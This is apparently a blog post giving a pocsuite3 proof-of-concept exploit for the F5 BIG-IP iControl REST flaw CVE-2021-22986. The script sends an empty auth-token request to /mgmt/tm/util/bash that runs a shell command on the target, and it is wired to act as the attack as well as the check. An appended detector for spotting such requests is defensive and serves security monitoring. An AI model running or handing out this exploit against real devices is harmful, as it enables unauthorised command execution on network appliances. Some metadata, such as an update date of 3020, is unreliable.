Wing
2021-03-21

F5-2021-22986

poc:

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author  : RedTeamWing
# @CreateTime: 2021/3/21 2:52 PM
# @FileName: F5-2021-22986.py
# @Blog:https://redteamwing.com
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, logger, VUL_TYPE
from pocsuite3.lib.utils import random_str
from urllib.parse import urlparse, urljoin


class DemoPOC(POCBase):
    vulID = '2020-520'  # ssvid
    version = '1.0'
    author = ['Wing']
    vulDate = '2020-05-20'
    createDate = '2020-05-20'
    updateDate = '3020-05-20'
    references = ['https://redteaming.net']
    name = 'F5-2021-22986'
    appPowerLink = ''
    appName = 'F5'
    appVersion = ''
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
    '''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    def _verify(self):
        result = {}
        # Request headers: an empty X-F5-Auth-Token is sent together with Basic auth
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0',
            'Content-Type': 'application/json',
            'X-F5-Auth-Token': '',
            'Authorization': 'Basic YWRtaW46QVNhc1M='
        }

        payload = {
        }
        path = "/mgmt/tm/util/bash"
        # Ask the bash utility endpoint to run `id`
        data = {'command': "run", 'utilCmdArgs': "-c id"}

        # Markers expected in the response when the command was executed
        verify_code = "commandResult"
        verify_code2 = "uid="
        url = urljoin(self.url, path)
        try:
            # The request is made inside the try block so that connection
            # errors and timeouts are logged instead of propagating
            resp = requests.post(url=url, headers=headers, json=data, timeout=8, verify=False)
            # resp = requests.post(url, data=payload)
            print(resp.status_code)
            if verify_code in resp.text and resp.status_code == 200 and verify_code2 in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = resp.text
        except Exception as ex:
            logger.error(str(ex))

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    _attack = _verify


register_poc(DemoPOC)
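
Seen from the defender's side, the request built by the PoC above has a recognisable shape: a POST to `/mgmt/tm/util/bash` with an `X-F5-Auth-Token` header that is present but empty, sent next to Basic credentials. The following detector is an added example, not part of the original post. The sample requests, the host `bigip.example` and the function names are constructed for illustration, and it assumes raw requests are available, for example from a proxy capture.

```python
import base64

BASH_UTIL_PATH = "/mgmt/tm/util/bash"  # path the PoC above posts to

# Constructed sample requests (not captured traffic).
SUSPECT = (
    "POST /mgmt/tm/util/bash HTTP/1.1\r\nHost: bigip.example\r\n"
    "Content-Type: application/json\r\nX-F5-Auth-Token: \r\n"
    "Authorization: Basic YWRtaW46eA==\r\n\r\n"
    '{"command": "run", "utilCmdArgs": "-c id"}'
)
BENIGN = (
    "GET /mgmt/tm/sys/version HTTP/1.1\r\nHost: bigip.example\r\n"
    "X-F5-Auth-Token: EXAMPLETOKEN\r\n\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None  # not a well-formed request line
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1].split("?", 1)[0], headers, body


def flag_request(raw):
    """Return the reasons a request matches the PoC's shape ([] if none)."""
    parsed = parse_request(raw)
    if parsed is None:
        return []
    method, path, headers, body = parsed
    if method != "POST" or path.rstrip("/") != BASH_UTIL_PATH:
        return []
    reasons = ["POST " + BASH_UTIL_PATH]
    if headers.get("x-f5-auth-token") == "":  # header present but empty
        reasons.append("empty X-F5-Auth-Token")
    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        try:
            user = base64.b64decode(auth[6:], validate=True).decode().split(":", 1)[0]
            reasons.append("Basic user=" + user)
        except ValueError:  # covers bad base64 and undecodable bytes
            reasons.append("malformed Basic credentials")
    if "utilCmdArgs" in body:
        reasons.append("utilCmdArgs in body")
    return reasons
```

A request that collects all four reasons matches the PoC exactly; a POST to this path alone is already worth reviewing when the management interface is reachable from untrusted networks.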

Test screenshot:
